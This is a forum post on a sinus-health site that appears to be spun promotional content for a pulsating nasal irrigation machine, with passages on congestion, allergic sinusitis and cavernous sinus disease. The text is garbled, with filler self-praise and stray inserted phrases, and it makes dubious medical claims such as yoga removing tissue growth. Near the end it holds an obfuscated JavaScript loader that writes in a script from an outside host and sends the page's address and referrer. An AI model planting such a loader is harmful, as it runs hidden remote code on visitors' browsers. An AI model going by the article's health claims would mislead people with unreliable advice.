sinus tip

All you ever wanted to know about sinus headache

You are not connected. Please login or register

Sinus Infection and New Advanced Sinus Irrigation System

Go down  Message [Page 1 of 1]

Admin

Admin

Sinus Infection

After two painful sinus operations which didn't resolve my problems, I started using pulsating nasal irrigation with a saline solution, and since then my health has improved dramatically. Instead of 2-3 or more sinus infections per year I have had two infections in 7 years, and those only occurred after long 24 hour trips from overseas when my resistance was way down. I used to get colds all the time, but now I watch others with colds and remark to myself how I never get them any more! Needless to say, I'm sold on pulsating sinus irrigation. (Note- I tried using a Neti Pot, but that method didn't work for me at all. There is something about the fast pulses of water that is particularly effective.)

Billions of Dollars Could be Saved

The well known ENT Dr. Robert Ivker, author of the book "Sinus Survival", states that there are over 40 million people in the U.S. alone that suffer from chronic sinusitis, defined as persistent inflammation and/or infection lasting longer than 8 to 12 weeks. All or most of these people could probably get control of their chronic sinus problems if they were to use a SinuPulse Elite' machine. Never be reluctant to admit that you don't know. There is no one who knows everything. So if you don't know much about Chronic Sinus, all that has to be done is to read up on it! Evil or Very Mad

• New sinus irrigation machine has recently been introduced called the SinuPulse Elite', and I've been using one for several weeks.
  • This article will discuss the machine and the results I've had.

The SinuPulse Elite' unit also comes with 30 packets of saline solution, and there is a user guide that explains exactly how to use the machine and how to mix a saline solution just using non-iodized salt if you prefer, rather than purchasing more saline packets. Variety is the spice of life. So we have added as much variety as possible to this matter www sinus infection to make it's reading relevant, and interesting! Surprised.

New Features- Mist Irrigation Attachments for Nose and Throat

The SinuPulse Elite' has some new features besides just normal nasal and throat irrigation. The unit comes with a mist producing irrigation tip which creates mist that can penetrate deeply and soothe nasal passages. It also comes with a mist producing throat irrigation tip and tongue cleaner. This attachment helps soothe the throat and tongue and also helps to remove food particles and bacteria that can cause bad breath.

You want to improve your health, get yourself a SinuPulse Elite' and use it daily. It feels a little funny at first and takes some getting-used-to (you don't normally have water going into one nostril and out the other), but it is really no big deal. Almost any good sinus book written in the past 5 years recommends nasal irrigation as a must-do to avoid sinus problems. Every cloud has a silver lining; so consider that this article on Chronic Sinusitis to be the silver lining to the clouds of articles on Chronic Sinusitis. It is this article that will add more spice to the meaning of Chronic Sinusitis.

Of course the standard nasal and throat irrigation tips are also available, and these do most of the "heavy lifting". The mist producing tips can make for additional comfort and relief, but these don't do the whole job and only use about 2 oz. of saline solution. 16 oz. of solution are used with each of the regular tips for nasal and throat irrigation using the SinuPulse Elite'. I personally do nasal irrigation twice a day because that regimen gives me great results. Some allergy sufferers only use the machine during allergy season, and that is all they need and works fine for them. Other people only use it when they feel like a cold is coming on. Did you ever believe that there was so much to learn about Chronic Sinus? Neither did we! Once we got to write this article, it seemed to be endless.

Simple and Natural Solution

This is a simple and natural way to avoid colds, allergies, and sinus problems that is inexpensive and highly effective. I spend no more than 5 minutes or so with the procedure each time, and that includes clean up, which is very easy. The best way of gaining knowledge about Sinus Infection is by reading as much about it as possible. This can be best done through the Internet.

• However, I honestly think that everyone should use pulsating nasal irrigation, not just sinus sufferers.
  • It's just a guess, but I would be willing to bet that everyone would eliminate on average one cold per year using pulsating nasal irrigation.
  • At $100 per doctor visit and countless more on drugs, the level of savings would be in the billions.
  • And this is not to mention gains in productivity and avoidance of the misery of living with a cold and resulting sinus infection in many cases.
  • We worked as diligently as an owl in producing this composition on Sinus Irrigation.
  • So only if you do read it, and appreciate its contents will we feel our efforts haven't gone in vain.

Skeptical At First

When something works, you are reluctant to change. Just because a new machine came along, I wasn't ready to jump in with both feet. However, my old machine broke down, and I obviously needed a new one. I wanted to stick with "old faithful", but I had to face the fact that this machine was the second one that broke down on me in a little over a year. The machine was very good, but the salt solution I used must have taken its toll. Go ahead and read this article on Chronic Sinus. We would also appreciate it if you could give us an analysis on it for us to make any needed changes to it.

One of the common symptoms of sinus is nasal congestion which is called sinus congestion. I personally have met many people suffering from sinus congestion who ask in expectancy the question ''how to get rid of sinus congestion?'' Now before we learn both the medical and home remedies of this sinus congestion it would fair to learn a little on this problem.

Now lets find out simple and effective methods which you can perform in your home on ''how to get rid of sinus congestion?''. If the causative agent are the microbes you need to go for nasal irrigation, good diet to improve immune system rich in vitamin C, minerals and other nutrients. You can also look for more home remedies in the web for sinus congestion. But on the other hand if its due to growth of tissue or muscle, Yoga is the best answer to your query. Yoga has been found to have the power to remove such growth and cure yours sinus congestion. We have to be very flexible when talking to children about Sinusitis. They seem to interpret things in a different way from the way we see things!

Why in Sinus a Person Experiences Nasal Congestion

There are basically two reasons for it and in some cases some other happenings may be the cause. But we are not moving to such deep lengths. Lets find the common reasons. First in sinusitis your sinuses are attacked by bacteria which cause infection and natural debris come out making the natural mucus thick and less lubricated. As a result it blocks the nasal passage. And the other reason could be the growth of tissue or muscle which intrudes the sinuses and also block nasal passage. And all the day you fee something chocking inside. Wink

Expect that its now clear to you how to get rid of sinus congestion? You can try the above said methods. Learn the proper Yoga exercises from any Yoga school and perform them in your home. When a child shows a flicker of understanding when talking about Sinuses, we feel that the objective of the meaning of Sinuses being spread, being achieved.

• Thus if you ask a doctor ''how to get rid of sinus congestion?'' he will answer you that it depends on your cause.
  • If its due to infection the medications will follow.
  • You will be prescribed antibiotics to kill the microbes, then analgesics to reduce pain if any and inflammation.
  • He may prescribe you nasal sprays too.
  • And in case of tissue or muscle growth if medications fail to stop their growth or shrink them, surgery is the best option.
  • Doctors would perform a surgery to get rid of sinus congestion.
  • These were medical applications to your question, ''how to get rid of sinus congestion?''

Allergic sinusitis occurs when there is pain in forehead, cheeks, around eyes and nose. It blocks the nasal cavities and does not let the mucus to drain freely. It occurs in spring season when flowers are at full bloom. The main causes are pollen of flowers, dust, pollution, rage wood etc. These particles are transported by air and enter into human body while inhaling air for breathing. These airborne substances unclog the nasal passages and sinusitis treatment may or may not include antibiotics. A person experiences the symptoms which include bad breath, watery eyes, sore teeth and excessive sneezing. Postnasal drip, loss of taste and smell are some other problems that are being faced by the sufferers. Rolling Eyes

Various Precautions Must be Taken to Keep Distance from Allergic Sinusitis

A person can use air purifier filler for keeping the house neat and clean. Use filter vacuums to collect dust because vacuums release 60% of collected dust. Also, one should keep the family pets out of the bedroom because animal's hair is also one of the prime causes of allergic sinusitis. Rolling Eyes

• The allergic sinusitis is severe, then it is better to consult a health care provider for treatment.
  • Some people take cold as a synonym of allergic sinusitis.
  • They are wrong at this.
  • An allergic sinusitis patients have to suffer from congestion, itchy eyes and runny nose and that usually are not symptoms in cold.
  • We have written a humorous anecdote on Sinusitis Infection to make it's reading more enjoyable and interesting to you.
  • This way you learn there is a funny side to Sinusitis Infection too!

Is important to note that the allergic sinusitis should be healed as early as possible. If one does not take immediate steps to cure, then one has to handle the other allergies also. Allergic sinusitis can be lessened with natural irrigation method. Neti or saline nasal spray is very much effective and provides an astounding relief too. It cleans the sinus passages and reduces the inflammation. This neti has been one of the effective treatments for many years and cured sufferers who had experienced this allergic sinusitis for a long time. It was at the spur of the moment that we ventured to write something about Sinusitis Patients. Such is the amount of matter that is available on Sinusitis Patients.

Stores However can Still Promote the Devices for Use With Tobacco the

Sinus Infection and New Advanced Sinus Irrigation System Vapor-pipes-sweet-puff-glass-pipe-vapor-jpg-x

You have allergic sinus it is important to drink liquids as much as possible. Liquid intakes make your body hydrate and also provide the balanced functioning of mucous membrane and sinuses. Moreover, take immediate bath after gardening for removing the pollen from the body. We were furnished with so many points to include while writing about Allergic Sinusitis that we were actually lost as to which to use and which to discard!

There are Number of Factors that Cause Sinusitis

The most common occurs when a cold causes swelling and congestion on the lining of the nose. Sinusitis may begin as a viral infection but within a few days it can develop into a bacterial infection. In many sinusitis patients, there may be one or more preexisting condition that adds to the problem. These include allergies, nasal polyps and nasal septum. These conditions cause the narrowing of the nasal passages and blockage the sinus openings. That is why some people undergo operations to improve their chronic sinus infections. Smile

• Understand that a well-balanced diet and lifestyle can help prevent sinusitis.
  • Over-the-counter medications can decrease the annoying symptoms of sinusitis.
  • But if sinusitis symptoms continue, it is better to seek the help of a physician.

For these reasons, some people have turned to the healing wonders of natural medicines. Goldenseal and olive extracts are effective in fighting bacterial and fungal infections. Vitamin C is also well known for its ability to strengthen the immune system and lessen allergic reactions. Zinc also shortens the duration of a cold by killing the cold virus, thus, reducing the risk of sinusitis. We have not included any imaginary or false information on Sinusitis Natural here. Everything here is true and up to the mark! Surprised.

Despite the fact that most sinusitis sufferers receive no benefit from antibiotics, most doctors still prescribe them. Most doctors also recommend decongestants although they can cause insomnia and nervousness. Long term use can also cause dependency to the drug. The side effects of nasal sprays cannot also be overlooked. It can cause high blood pressure, mood swings, acne, peptic ulcers glaucoma and weight gain. Although surgery can be the last resort to severe sinusitis there is still no guarantee that it will be successful, it could even make matters worse. Smile

There are also natural ways you can take to overcome the problem of sinusitis. First, as much as possible avoid inhaling traffic fumes, cigarette smokes and chemicals at home or at work. Second, exercise regularly. Even walking for thirty minutes three to four times a week can be very effective. Third, avoid foods such as eggs, wheat, fatty foods, pastries, sugar, chocolate and any food that contains food additives. Fourth, eat more fruits and vegetable, fish, hot chicken and salads. Fifth, drink two to drew university water a day. Keep in mind that water helps in keeping the body clean. Lastly, when suffering from colds, inhalation is a tested way of relieving blocked sinuses.

Let us first learn where it is located to know more about what is cavernous sinus. The cavernous sinus is called the lateral sellar compartment and it is located inside the human head. The cavity is made up of a set of veins within a thin wall. It is seen on one side of the temporal bone and sphenoid bone of the skull.

The Pituitary Gland Lies in Between the Cavernous Sinus Pair

The cavernous sinus compresses if there is a growth in the pituitary gland ultimately leading to tumors and opthalmpplegia (loss of ophthalmic sense) and maxillary nerve compression the ways to get over maxillary sinus disease loss. Isn't it wonderful that we can now access information about anything, including Sinus Cavity form the Internet without the hassle of going through books and magazines for matter! Wink

The symptoms found are blindness, ocular and conjunctival congestion, ophthalmoplegia, elizabethtown college ocular pressure and pain. The signs may be one-sided or two-sided; they may be sharp and progress slowly. Embarassed

How to Detect

CT scan is taken to get an idea of bone and calcium. MRI provides features of soft tissues inside the sinus and the surrounding structures. Orbital views are also needed, seeing superior and inferior orbital veins helps in diagnosing the venous pressure. Based on the findings further treatment could be given. The more you read about Sinus, the more you get to understand the meaning of it. So if you read this article and other related articles, you are sure to get the required amount of matter for yourself.

What is Cavernous Sinus Thrombosis?

Cavernous sinus thrombosis seldom occurs now days. Ten percent of people may be affected by blindness in this case. Corneal ulceration is caused due to lid closure. Due to contact of the cavernous sinus with other venous channels, an infection may occur. It has to be diagnosed clinically and no lab culture is prevalent.

What is Cavernous Sinus Tumor?

A paralysis of eye muscles is seen with diplopis (two visions of a single image) is very common.A history of cancer is also predicted.The eyeball is seen protruding abnormally.Endocrine and visual defects are also present.A chronic sinusitis or diabetic patients are at high risk of acquiring it.Staphylococcus aureus, is the contributing agent, although streptococci, pneumococci, and fungi may be implicated in rare cases. This article will help you since it is a comprehensive study on Sinus Treatments.

var c2="sinusitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

https://sanfordhenry.forumotion.com

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum